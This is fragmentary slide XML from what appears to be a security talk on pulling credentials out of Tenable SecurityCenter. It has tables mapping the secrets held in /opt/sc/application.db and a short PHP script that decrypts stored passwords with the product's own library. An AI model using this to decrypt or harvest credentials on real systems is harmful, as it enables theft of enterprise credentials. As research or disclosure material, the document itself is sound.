              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>'][1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>AuthenticationLib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>decryptString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>);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 err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>Decrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>: '$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>'\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" i="1" dirty="0"/>
              <a:t>?&gt;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8" y="2796055"/>
            <a:ext cx="5708591" cy="588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99" y="1525575"/>
            <a:ext cx="3978852" cy="77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1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8025E-6 L 0.15295 0.1339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Picture of Known Credentials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758" y="3320870"/>
            <a:ext cx="2202873" cy="2352952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>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="37607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of credentials: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kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="37607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 / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="37607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nix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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Databases / Patch Management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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VMWare ESX / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vCenter</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="37607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kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="37607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Routers / Firewalls</a:t>
            </a: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1344168" y="378366"/>
            <a:ext cx="7114032" cy="411898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655" y="3486361"/>
            <a:ext cx="383231" cy="37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698" y="1869005"/>
            <a:ext cx="619808" cy="3949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805" y="2822984"/>
            <a:ext cx="613463" cy="390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136" y="3190850"/>
            <a:ext cx="438264" cy="3271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600" y="3532723"/>
            <a:ext cx="678239" cy="323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412" y="3862874"/>
            <a:ext cx="613463" cy="3908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188" y="2426753"/>
            <a:ext cx="595789" cy="284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502" y="3981782"/>
            <a:ext cx="442107" cy="3300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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="3300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9083" y="2879375"/>
            <a:ext cx="488862" cy="311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1957" y="3277763"/>
            <a:ext cx="364014" cy="2825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0583" y="1414173"/>
            <a:ext cx="340217" cy="2640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3289" y="2411400"/>
            <a:ext cx="340217" cy="2640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5877" y="2447163"/>
            <a:ext cx="340217" cy="2640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6225" y="3908821"/>
            <a:ext cx="285175" cy="249077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Explosion: 8 Points 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987370" y="1334685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Explosion: 8 Points 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052676" y="2348479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Explosion: 8 Points 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7933191" y="2349081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Explosion: 8 Points 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5600737" y="3196753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Explosion: 8 Points 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6284135" y="3855123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Explosion: 8 Points 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224523" y="2565802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Explosion: 8 Points 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211552" y="1598109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Explosion: 8 Points 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5177924" y="3526511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Explosion: 8 Points 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355492" y="1648094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Explosion: 8 Points 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355492" y="2591627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Explosion: 8 Points 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6433331" y="3516576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Explosion: 8 Points 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591363" y="2148114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77576" y="2006868"/>
            <a:ext cx="602299" cy="339323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Explosion: 8 Points 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3773823" y="3161157"/>
            <a:ext cx="569786" cy="591280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4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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>application.db</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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193510"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="579485" y="878503"/>
          <a:ext cx="8055537" cy="340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0871">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2643769905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1619345">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2945713519"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4595321">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2764253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Table</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="905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  <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="905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  <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="90535"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1882802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AdminUser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Users with the admin role: can create Security Managers for organizations; configure scanners, repositories, etc.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3021807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App[TYPE]Credential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Credentials available for all organizations.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280065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AppPolicyPref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effectLst/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>authPref</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>]*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Encrypted credentials (e.g., x509, SCCM, VMware ESX, etc.) available for all organizations.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3626747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AppRole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perm*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True/false values for role permissions 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272545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Configuration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EncryptionSuffix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U</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sed by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>UUID.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (via </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Utility.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> ) as salt for SHA1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67417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Configuration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PassivePlugin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>*</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>LCEPlugin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>*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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Plugin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r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Activation code, login and password to download plugins:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>https://[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" b="1" dirty="0"/>
                        <a:t>LCEPluginUpdateSite</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>]/get.php?u=[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" b="1" dirty="0"/>
                        <a:t>LCEPluginSubscriptionLogin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>]&amp;p=[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>LCEPluginSubscriptionPassword</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>&amp;f=[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                        <a:t>LCEPluginPackage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>]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3261054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28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209554"/>
            <a:ext cx="3476258" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>application.db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>contiue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>)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898296"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="450166" y="709691"/>
          <a:ext cx="8328073" cy="38374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6958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2643769905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1369211">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2945713519"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4491904">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2764253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Table</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="905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  <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="905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  <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="90535"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1882802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Configuration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LDAP*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SMTP*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WebProxy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>*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Hostname / IP, username, password for LDAP / SMTP/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>WebProxy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> authentication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3021807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Email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message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Emails and the content of messages (can be used for spear phishing)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280065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*Repository</a:t>
                      </a:r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Information on repositories (logical division of corporate assets) for PVS, LCE, Nessus, and Mobile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3626747690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Organization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Names and IDs of available organizations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2725458061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PublishingSite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URI, username, password (or certificate) for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>publishing site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279760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Scanner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Hostname / IP, username, password for registered Nessus scanners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143213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Zone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 logical division of Nessus scanners for an organization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1197590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34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9717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68" y="378366"/>
            <a:ext cx="3476258" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>application.db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>contiue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>)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495135"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="579486" y="878503"/>
          <a:ext cx="813545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09899">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2643769905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1337542">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2945713519"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4388009">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2764253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Table</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="905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  <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="905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  <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="90535"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1882802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UserAuth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password</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="9053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 “hashed” value of user-defined password</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90535" marR="90535" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2800555716"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661182" y="1765494"/>
            <a:ext cx="7943068" cy="2642379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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>defines.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>";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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> = SCROOT;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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> = $GLOBALS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>'][1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>AuthenticationLib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>generatePasswordHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>);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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Hashed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>: '$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>'\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>?&gt;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44" y="2041061"/>
            <a:ext cx="676275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4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Picture of Known Credentials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00" y="3187962"/>
            <a:ext cx="2202873" cy="2352952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rgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More credentials:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="37607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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credentials for all organizations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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mail Server / LDAP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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecurityCenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376076"/>
              </a:solidFill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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>essus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ LCE / PVS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en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="37607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essu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s Cloud / Tenable.io</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="37607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1344168" y="378366"/>
            <a:ext cx="7114032" cy="411898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655" y="3486361"/>
            <a:ext cx="383231" cy="370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698" y="1869005"/>
            <a:ext cx="619808" cy="3949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805" y="2822984"/>
            <a:ext cx="613463" cy="390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136" y="3190850"/>
            <a:ext cx="438264" cy="3271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600" y="3532723"/>
            <a:ext cx="678239" cy="323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412" y="3862874"/>
            <a:ext cx="613463" cy="3908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188" y="2426753"/>
            <a:ext cx="595789" cy="2845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2485" y="3976945"/>
            <a:ext cx="442107" cy="3300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025" y="3907703"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="330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9083" y="2879375"/>
